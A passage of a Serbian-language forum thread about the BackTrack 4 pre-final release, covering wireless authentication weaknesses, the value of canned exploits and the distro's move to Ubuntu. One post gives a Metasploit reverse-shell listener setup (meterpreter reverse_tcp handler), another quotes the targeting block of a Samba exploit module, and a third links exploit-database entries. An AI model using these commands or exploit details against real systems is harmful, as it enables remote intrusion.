Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

BackTrack 4 PreFinal - public release!!!

[es] :: Linux :: BackTrack 4 PreFinal - public release!!!

Strane: 1 2 3 4 5

[ Pregleda: 29201 | Odgovora: 83 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 15:23 - pre 180 meseci
Actually, MAC-based autentifikacija bez enkripcije je jos gora varijanta.. Dovoljno je da sniffas za pakete na tom kanalu i pokupis mac adresu i koriscenjem razlicitih mac-spoofing alata bypassujes auth.

Generalno, wireless kao vrsta komunikacije se ne treba koristiti za razmenjivanje delikatnih informacija, jer uvek postoje methode kojima mozes bypassovati razlicite autentifikacije, zbog samog principa rade wireless tehnologije.
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 15:29 - pre 180 meseci
Pricha koliko god da je kratka i ne preterano ozbiljna
,opisuje izvodljiv scenaro

Citat:
combuster: Da, bas me zanima brojka HG520 rutera koji imaju enabled wireless a koji nisu zasticeni niti preko wpa niti preko wep-a niti preko mac access-a... Kome treba bt za to ;-)


...e vidish ovakve stvari su pomalo dosadne i puni su forumi osmeha i veruj mi da sam pochastvovan tvojim revoltom ...jer barem je pricha otishla u nekom pravcu
inache svidja mi se shto si izneo par informacija o svojoj postavci

Citat:
combuster

Promeni attitude covece moj ti je prijateljski savet ili...


...predrasude o mom attitude.u govore o tvojoj spremnosti da prihvatish situaciju ...uz moje iskrene nade mogao si da okrenesh na igru ...umesto shto si repertirao shotgun mogao si da se nadovezesh na prichu i da uchestvujemo u izmeshljenom scenariju npr.
...e sad ajde vidim da imash neke dragocenosti na mashinama pa i donekle razumem tvoje reakcije ...mada su krajnje ne produktivne

Citat:
combuster:.. A bese prodje decenija cela od kada sam sekirao nazovi hakere preko irc-a koji su isti kao i danas (samo su sa sub7 presli na bt) jer zaboga kako sme exploit koji je radio na 99% masina u to vreme da fail-uje na mojoj a sve sto sam ucio o virusima i exploitima je bilo upravo zbog ucenja kako da zastitim masine od istih, jer znas, to se za razliku od 'akovanja wifi-a u parku placa...


...nisam te najbolje razumeo ...shta se placa? znanje ...crashevi?

[Ovu poruku je menjao Kernel-1 dana 22.06.2009. u 16:55 GMT+1]
...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 16:01 - pre 180 meseci
@x.starlight - ukoliko samo i izmedju-redova osetim nesto slicno onome sto si napisao ("Go kill yourself"),
svaki naredni takav post ce ti biti obrisan (ceo). Sada sam se potrudio da uklonim samo flame i odgovre na
tvoje flejmovanje, ali ubuduce ide ceo post.

Dalje, potrudi se da malo poradis na formatiranju svojih postova kako bi bili lakse citljivi
(ne trebaju ti one silne tackice, kao sto je vec neko rekao).

I molim te bez odgovora na ovu moju poruku, oko ovoga nema rasprave.
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 16:14 - pre 180 meseci
Pa covece svaka ta imaginarna prica je ista i to sve po koracima:

1. Dobijes pristup mrezi
2. Ubacis maliciozni content
3. Podesis da se on automatski pokrene ili da ga user nekako startuje sam
4. Zaobilazi zastitu ako postoji i omogucava remote attacker-u da sa svoje masine dobije odredjena prava na sistemu
5. Od ove tacke se imaginarna prica menja

E sad moze da se masta do nakosutra...

Citat:

Ovo ti pisem bez truncice flame-a jer sam se takvih kao ti navidjao u zivotu svome...


Lepo sam ti objasnio u poruci... Ona tvoja imaginarna pricica je mnogo busna i kada neko ko se ne uplasi od

Code:

./msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.88
msf > set LPORT 4444
msf > exploit


i kada dopre u srz tvoje imaginarne pricice shvati da se nista ne razlikuje od onoga gore sto sam napisao kao ni od svakog remote attack-a since the beginning of time...

I zasto se o tome govori ovde na bt thread-u? Jel o tome koje su mogucnosti novog distro-a ili o imaginarnim hacking scenarijima...?

Citat:

i pricha koliko god da je kratka i ne preterano ozbiljna
,opisuje izvodljiv scenaro


Jeste izvodljiv ali ti rekoh u uslovima koji su idealni za attacker-a... A kao sto rekoh vidjao sam dosta njih u zadnje vreme koji konektovanjem na nezasticene telekomove rutere i koriscenjem tudjeg protoka nazivaju hakovanjem i otuda netolerantnost prema imagination realm-u... I ako vec o necemu mastas nemoj da mene ubacujes u mastu u djakuziju... Gives me the creepZ

Takodje posedujem netolerantnost prema aroganciji pogotovo ne na linux thread-ovima, ovde smo da pomognemo, ako si zeleo da pridoneses temi sto ne odgovori na
Citat:

el ima u tom BT alata za skeniranje/provjeru web stranica na XSS, SQL injection i slične stvari?
Imam problema sa jednim sajtom PHP/MySQL i izgleda da postoji neki propust u samom kodu.

?

Citat:

...nisam te najbolje razumeo ...shta se placa? znanje ...crashevi?


Preterao sam malo sa tim delom poruke, samo sam hteo da istaknem ono sto sam vec rekao a to je da se pristup tudjem sistemu nije promenio jos od tada, sub7, netbus i backorrifice a sada i bt sa svim svojim alatima za forenziku...

Sve u svemu poruka ti je bila arogantna, mastarija smesna a ukljucivala je i mene i zbog toga sam odreagovao malo odsecnije (veruj mi nisam bio uzrujan ni sekundu dok sam je pisao)... Nisam te vidjao na es-u i nisam smatrao da imas za pravo da onako reagujes...

ontopic:

Koliko sam video koristi KDE kao DE, ima opciju za ucitavanje u RAM... Jel probao neko ovo i koliko memorije guta onda?

@Srdjan

Nisam video tvoju poruku gore, ako treba edituj post a od sada obecavam samo ontopic...
make love - !war
 
Odgovor na temu

mulaz
Ljubljana

Član broj: 47602
Poruke: 2239
*.dial-up.siol.net.

Jabber: mulaz@elitesecurity.org
Sajt: www.mulaz.org


+184 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 16:51 - pre 180 meseci
Koliko ja znam, metasploit radi na svim distrotima.
Nije mi jasno zasto drzati posebnu distribuciju za 'hacking' kad mozes iz svoje 'maticne' distribucije da uradis sve sto moze i bt ili bilokoja druga.
Inace i preko nezasticenog wirelessa, moze bez problema da se izvrsi privatna komunikacija/data transfer preko jednostavnih ssl tunela.
Bolje ispasti glup nego iz aviona
http://www.mulaz.org/
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 16:52 - pre 180 meseci
^^ Ok. I da, dalje prica moze da se nastavi o tome sta ima novo u BT4
u odnosu na ranije verzije, sa "hakovanjem" smo zavrsili.
 
Odgovor na temu

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 16:56 - pre 180 meseci
Citat:
mulaz: Koliko ja znam, metasploit radi na svim distrotima.
Nije mi jasno zasto drzati posebnu distribuciju za 'hacking' kad mozes iz svoje 'maticne' distribucije da uradis sve sto moze i bt ili bilokoja druga.


Ziva istina to sto kazes, samo sto bt ima tu prednost da je radjen iskljucivo za pen testing, pa poseduje zbog toga vec ready-bake alate bez downloadovanja. Kad smo vec kod toga, bt u principu ne bi trebalo koristiti kao stand-alone distro, odnosno da ga drzite na masini kao distro za svakidasnju upotrebu, jer ne postoje security patchevi.
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:04 - pre 180 meseci
Ako je vec slax ili ubuntu based jel to znaci da ne moze preko njihovih repoa da se update-uje base system?
make love - !war
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:07 - pre 180 meseci
Mislis debian based? ;) da, i mene to zanima, zasto ne bi mogao da ga apdejtujes (.deb pakete iz repoa)?
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:22 - pre 180 meseci
Evo i gledam sad source exploita, covece oni su tesko zavisni od verzije linuxa koje furas i verzije servisa koji su pokrenuti, skripte su uglavnom bazirane tako da prepoznaju recimo sysname, znaci ja sto sam menjao utsname u kernelu sam automatski safe od ovakvih zajebancija? :)
make love - !war
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:35 - pre 180 meseci
To je normalno, sto vise kastomizujes svasta nesto na svom sistemu,
(raznorazne varijable, lokacije odredjenih vaznih fajlova), to ce kojekakve
skripte manje da se "snalaze" jer se neretko oslanjaju na nake "default" postavke. Jel da? :)

Mada sve zavisi od sposobnosti onoga ko skriptu pise.

Ja sam iskreno toliko "zabrinut" za svoju sigurnost, da cak i firewall ne palim na linuxu... :D
(redovan bekap vaznih podataka je majka - mara)
 
Odgovor na temu

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:40 - pre 180 meseci
Citat:
Kernel-1: Mislis debian based? ;) da, i mene to zanima, zasto ne bi mogao da ga apdejtujes (.deb pakete iz repoa)?


Verovatno zato sto je kernel kao i svaki paket preuzet od slaxa optimizovan za pen testing..

@combuster, da li si safe od nekog exploita zavisi o kakvom je exploitu rec, da li imas najnoviji patch, itd. Ukoliko se pokaze da je tvoj sistem vulnerable lako je optimizovati scriptu da radi i sa tim izmenama :)
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:41 - pre 180 meseci
Pa ovo su sve ruby skripte, snimi deo ovog samba exploita:

Code:

'Targets'        => 
                [
                    ['Linux vsyscall', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 1024,                        
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0xffffe410 },
                                'Stop'  => { 'Ret' => 0xffffe413 },
                                'Step'  => 1,
                            }
                    }    
                    ],

                    
                    ##
                    # 08356000-0843d000 rwxp 08356000 00:00 0 (Debian)      # KF
                    # 80300000-8042f000 rw-p 80300000 00:00 0 (Gentoo)      # hdm
                    # b800f000-b80c9000 rwxp b800f000 00:00 0 (RHEL/CentOS) # Adriano/Ramon
                    # 80365000-80424000 rwxp 80365000 00:00 0 (SUSE)        # Adriano/Ramon
                    # 8033c000-80412000 rwxp 00000000 00:00 0 (Slackware)   # Adriano/Ramon
                    # 08342000-08436000 rwxp 00000000 00:00 0 (Ubuntu)      # hdm
                    # 08270000-0837f000 rwxp 00000000 00:00 0 (SNAP)        # Andrew
                    # 
                    ##

                    ['Linux Heap Brute Force (Debian/Ubuntu)', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 64*1024,
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0x08352000 },
                                'Stop'  => { 'Ret' => 0x0843d000 },
                                'Step'  => 60*1024,
                                
                            }
                    }
                    ],

                    ['Linux Heap Brute Force (Gentoo)', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 64*1024,
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0x80310000 },
                                'Stop'  => { 'Ret' => 0x8042f000 },
                                'Step'  => 60*1024,
                                
                            }
                    }
                    ],



                    ['Linux Heap Brute Force (Mandriva)', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 64*1024,
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0x80380000 },
                                'Stop'  => { 'Ret' => 0x8045b000 },
                                'Step'  => 60*1024,
                                
                            }
                    }
                    ],
                    
                    ['Linux Heap Brute Force (RHEL/CentOS)', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 64*1024,
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0xb800f000 },
                                'Stop'  => { 'Ret' => 0xb80c9000 },
                                'Step'  => 60*1024,
                                
                            }
                    }
                    ],

                    ['Linux Heap Brute Force (SUSE)', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 64*1024,
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0x80365000 },
                                'Stop'  => { 'Ret' => 0x80424000 },
                                'Step'  => 60*1024,
                                
                            }
                    }
                    ],

                    ['Linux Heap Brute Force (Slackware)', 
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 64*1024,
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0x8033c000 },
                                'Stop'  => { 'Ret' => 0x80412000 },
                                'Step'  => 60*1024,
                                
                            }
                    }
                    ],

                    ['DEBUG',
                    {
                        'Platform'      => 'linux', 
                        'Arch'          => [ ARCH_X86 ],
                        'Nops'          => 1024,                        
                        'Bruteforce' => 
                            {
                                'Start' => { 'Ret' => 0xAABBCCDD },
                                'Stop'  => { 'Ret' => 0xAABBCCDD },
                                'Step'  => 4,
                            }    
                    }
                    ],    
                ],
            'DisclosureDate' => 'May 14 2007',
            'DefaultTarget'  => 0
            ))


On tacno zna gde da gadja u zavisnosti od platforme, jbt ja sam ovde Unix compatible, moram sam da editujem build skripte da bih kompajlirao nesto rucno....

Ono sto je po meni zaista pretnja jeste neki opaki programer koji ce da napravi skriptu konkretno za ciljni sistem, ovo "pogadjanje" sa predefinisanim skriptama sukZ... E sad i nije neka nauka da se edituje skripta i prilagodi meti :)
make love - !war
 
Odgovor na temu

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 17:51 - pre 180 meseci
Sad vec ulazimo u "hacking" vode po kojima nam je cika Kernel zabranio da plivamo.. :)

Ali da, pretpostavljam da si u pravu, customizacija moze da bude tu problem, ali sve je moguce sa dovoljno znanja i strpljenja.. Po tome se i izdvajaju klinci sa previse slobodnog vremena od lica strucnih za te stvari.. :)
 
Odgovor na temu

combuster
Ivan Bulatovic
Kraljevo

Član broj: 151351
Poruke: 4563
93.86.111.*

Sajt: www.linuxsrbija.org


+104 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 18:02 - pre 180 meseci
Pa dobro, sad ne pricamo konkretno nesto nego cisto diskutujemo koliko je pen testing sa predefinisanim exploitima u stvari delotvoran i pokazatelj celokupne sigurnosti sistema, verovatno ovi noviji koji iskoriscavaju neki bug u browser-u i slicno mogu da budu efikasni ali ovi vezani za sistemske procese i servise su mi sumnjivi jer security fixevi izlaze non stop a oni koliko vidim uvek gadjaju neku specificnu memorijsku adresu ili koriste specifican kod koji dovodi do crash-a ciljanog servisa, naravno da developeri prate ove exploite i mnogo im je tesko da zakrpe isti, jos da im kazu hvala na insight-u :D
make love - !war
 
Odgovor na temu

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 18:18 - pre 180 meseci
Developer ce patchovati exploit prvom prilikom, ali problem je u tome sto su admini previse lenji da bi redovno update-ovali sistem... A javlja se tu i problem 0-day exploita, odnosno onih exploita koji jos nisu poznati developerima ali su poznati hakerima...

Inace, exploit vrlo cesto ne gadja sistem, vec aplikaciju a tu neko veliko znanje i nije potrebno. RFI i SQL injection vulnovi su postali dosta popularni :

Code:

http://www.milw0rm.com/exploits/8920
http://www.milw0rm.com/exploits/8980
http://www.milw0rm.com/exploits/8977
 
Odgovor na temu

jorganwd
Muris Kurgaš
/dev/null

Član broj: 65537
Poruke: 779

Sajt: www.remote-exploit.org


+34 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 18:29 - pre 180 meseci
Momci, polako.

Prvo, security scena se itekako promijenila od doba sub7, y3k, back-orifice-a itd.

Drugo, da ste malo procitali i pogledali u distro, vidjeli bi ste par radikalnih promjena kao sto je:

- bt vise nije zasnovan na slax-u, vec ubuntu based.
- bt ima svoj repozitorijum zajedno linkovan sa ubuntu repozitorijumom
- na repo-u se nalaze svi alati, redovno update-ovani.
- na ubuntu se preslo iz gore navedenih razloga, kada je na defcon-u primjeceno da velika vecina koristi bt a s tim i ranjivi wget koji niko nije update-ovao

zbog ovih stvari je remote-exploit odlucio napraviti distro. Javna je tajna da bt koristi izmedju ostalog i brojne vladine i vojne agencije, ovom problemu se moralo stati na kraj i bt je postao prava distribucija.

bt ima alata vise nego ikada.

u bt-u se nalaze i nekoliko alata nasih security istrazivaca.

Samo malim cesljanjem po remote-exploit forumu, wiki stranicama, kao i samom blog-u! mozete uvidjeti sta sve bt4 ima, a sta nije imao prije, da ja ne bih nabrajao...

pozdrav
 
Odgovor na temu

anon68680

Član broj: 68680
Poruke: 528
77.46.169.*



+14 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 18:33 - pre 180 meseci
Bas sam to i skapirao sad... ja se izvinjavam, sam sam kriv sto ne citam "whats new" section :)
 
Odgovor na temu

x.starlight

Član broj: 225316
Poruke: 8
*.kbcnet.co.yu.



Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 22:17 - pre 180 meseci
.mislim da je neko na remote-exploit forumu ,josh dok je bt3 bila aktuelna pokrenuo temu tipa shta mislite o ubuntu base bt i neshto su ga smorili :) ali eto ispade na kraju da je stvarno ideja zazivela
Citat:


jorganwd: Momci, polako.

Prvo, security scena se itekako promijenila od doba sub7, y3k, back-orifice-a itd.

Drugo, da ste malo procitali i pogledali u distro, vidjeli bi ste par radikalnih promjena kao sto je:

- bt vise nije zasnovan na slax-u, vec ubuntu based.
- bt ima svoj repozitorijum zajedno linkovan sa ubuntu repozitorijumom
- na repo-u se nalaze svi alati, redovno update-ovani.
- na ubuntu se preslo iz gore navedenih razloga, kada je na defcon-u primjeceno da velika vecina koristi bt a s tim i ranjivi wget koji niko nije update-ovao


.upravo to
...random starlight meets a blind eye
seeking undiscovered self-importance ...
pleasant distance finds me still
slighly awaiting what is getting closer...
 
Odgovor na temu

Srđan Pavlović
Specijalna Edukacija i Rehabilitacija MNRO
Vojvodina, Bačka Palanka

Član broj: 139340
Poruke: 5571
*.static.isp.telekom.rs.

Sajt: www.oligofrenolog.com


+382 Profil

icon Re: BackTrack 4 PreFinal - public release!!!22.06.2009. u 22:35 - pre 180 meseci
Iskreno, jel neko od vas sanjao da ce BT jednog dana da bude zasnovan na Ubuntu-u? Hehe.... ;)

Bila bi dobra fora da u standardni Ubuntu ubace neki meta-paket tipa "bt-tools" koji bi instalirao alate iz BT-a :)
 
Odgovor na temu

[es] :: Linux :: BackTrack 4 PreFinal - public release!!!

Strane: 1 2 3 4 5

[ Pregleda: 29201 | Odgovora: 83 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.